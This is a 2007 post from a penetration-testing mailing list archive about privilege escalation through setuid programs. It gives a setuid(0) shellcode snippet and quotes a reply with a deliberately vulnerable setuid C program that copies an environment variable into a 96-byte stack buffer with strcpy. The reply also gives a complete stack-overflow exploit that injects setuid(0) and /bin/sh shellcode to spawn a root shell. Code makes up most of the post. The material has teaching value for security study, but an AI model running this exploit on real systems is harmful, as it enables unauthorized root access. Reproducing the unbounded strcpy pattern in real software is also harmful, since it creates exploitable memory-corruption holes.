Penetration Testing mailing list archives
Re: question on escalating privileges via suid vulnerabilities
From: "John McGuire" <jmcguire81 () gmail com>
Date: Wed, 28 Feb 2007 12:20:43 -0700
Here is the assembly I finally came up with for this. It shaves off a byte if space is critical: //setuid(0), Opcode 17 "\x31\xdb" // xorl %ebx,%ebx "\x8d\x43\x17" // leal 0x17(%ebx),%eax //eax = ebx+0x17 "\xcd\x80" // int $0x80 John On 2/27/07, Fábio Russo <fabio.contin.russo () gmail com> wrote:
>Try with "setuid(0);" before execve :-) >-- >Andrea "bunker" Purificato >+++++++++++[>++++++>+++++++++++++++++++++++++++++++++>++++ >++++++<<<-]>.>++++++++++.>.<----------.>---------.<+++++++. > >http://rawlab.mindcreations.com Hi. Some applications need a setuid(0) before the /bin/sh string because it have the suid bit set. see the exemple below: // buged program with setuid bit set and root privileges: int main(int argc, char **argv) { char env[96]; // Shows the return address for exploiting printf("- %p -\n", &env); strcpy(env,getenv("BOLINHA")); return(0); } //exploit: usage ./exploit <bugged_program> <return addr> extern char **environ; char shellcode[]="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main(int argc, char **argv) { char string_longa[128]; long *ptr = (long *) string_longa; int i; for(i=0; i<32; i++) *(ptr + i) = (int) strtoul(argv[2],NULL,16); for(i=0; i<(int) strlen(shellcode); i++) string_longa[i]=shellcode[i]; setenv("BOLINHA", string_longa, 1); execle(argv[1], argv[1], NULL, environ); printf("%s\n", string_longa); return (0); } Taking a close look into exploit source code we can see that the firsts bytes in the shellcode are the setuid(0), more preciselly the \x31\xc0\x31\xdb\xb0\x17\xcd\x80. This is needed to get a root shell. if you cut those bytes off from shellcode, you will get a shell that belongs to the user who executed the exploit. I hope it can be usefull for someone. -: ) bye. ------------------------------------------------------------------------ This List Sponsored by: Cenzic Need to secure your web apps? Cenzic Hailstorm finds vulnerabilities fast. Click the link to buy it, try it or download Hailstorm for FREE. http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW ------------------------------------------------------------------------
------------------------------------------------------------------------ This List Sponsored by: Cenzic Need to secure your web apps? Cenzic Hailstorm finds vulnerabilities fast. Click the link to buy it, try it or download Hailstorm for FREE. http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW ------------------------------------------------------------------------
Current thread:
- Re: question on escalating privileges via suid vulnerabilities John McGuire (Mar 01)